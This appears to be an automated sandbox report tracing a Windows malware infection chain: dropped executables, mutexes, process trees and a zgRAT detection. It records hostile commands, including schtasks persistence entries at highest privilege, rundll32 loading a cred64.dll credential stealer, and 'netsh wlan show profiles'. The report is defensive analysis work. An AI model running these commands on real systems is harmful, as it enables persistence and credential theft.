                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0084D2B08_2_0084D2B0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0084C3E08_2_0084C3E0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007EF7308_2_007EF730
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0084B7E08_2_0084B7E0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008AC8D08_2_008AC8D0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0077B8E08_2_0077B8E0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008449B08_2_008449B0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00808A808_2_00808A80
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00801A608_2_00801A60
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0080CBF08_2_0080CBF0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00817D208_2_00817D20
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0080AEC08_2_0080AEC0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00803ED08_2_00803ED0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007FDF608_2_007FDF60
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008B40A08_2_008B40A0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008A20C08_2_008A20C0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007F21008_2_007F2100
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008111308_2_00811130
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007A71908_2_007A7190
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008B31608_2_008B3160
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007B035F8_2_007B035F
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008603508_2_00860350
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0079F5708_2_0079F570
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007C47AD8_2_007C47AD
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007AC9508_2_007AC950
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007AA9188_2_007AA918
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007BDA748_2_007BDA74
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008B4AE08_2_008B4AE0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00854B908_2_00854B90
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00800BA08_2_00800BA0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007C8BA08_2_007C8BA0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007C8E208_2_007C8E20
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00811E408_2_00811E40
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0085BFC08_2_0085BFC0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_0085CFC08_2_0085CFC0
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: String function: 000EF9F2 appears 40 times
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: String function: 000F0A30 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: String function: 000D9CB3 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: String function: 0078ACE0 appears 86 times
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                Source: alexxxxxxxx[1].exe.44.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: swiiiii[1].exe.44.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: swiiiii.exe.44.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: alexxxxxxxx[1].exe.44.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9904153184604905
                                Source: file.exeStatic PE information: Section: wqkjverv ZLIB complexity 0.9948664563962207
                                Source: explorta.exe.0.drStatic PE information: Section: ZLIB complexity 0.9904153184604905
                                Source: explorta.exe.0.drStatic PE information: Section: wqkjverv ZLIB complexity 0.9948664563962207
                                Source: amert[1].exe.2.drStatic PE information: Section: ZLIB complexity 0.9970191976584022
                                Source: amert[1].exe.2.drStatic PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
                                Source: amert.exe.2.drStatic PE information: Section: ZLIB complexity 0.9970191976584022
                                Source: amert.exe.2.drStatic PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
                                Source: chrosha.exe.26.drStatic PE information: Section: ZLIB complexity 0.9970191976584022
                                Source: chrosha.exe.26.drStatic PE information: Section: nkxbjlfg ZLIB complexity 0.994648871020736
                                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@134/170@0/32
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001437B5 GetLastError,FormatMessageW,4_2_001437B5
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001310BF AdjustTokenPrivileges,CloseHandle,4_2_001310BF
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_001316C3
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_001451CD
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0015A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0015A67C
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,4_2_0014648E
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,4_2_000D42A2
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMutant created: NULL
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess12156
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12172:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:11920:64:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8384:64:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:11880:64:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2584
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\5454e6f062Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: 2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: 2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                                Source: 2531414c80.exe, 00000008.00000003.2251127325.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300537130.0000000008430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300108474.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304669864.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301424641.0000000008423000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2292643859.00000000079B7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2346102842.0000000007AAE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2290504477.00000000079B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: file.exeReversingLabs: Detection: 47%
                                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorta.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorta.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: 2531414c80.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: 2531414c80.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                                Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe"
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
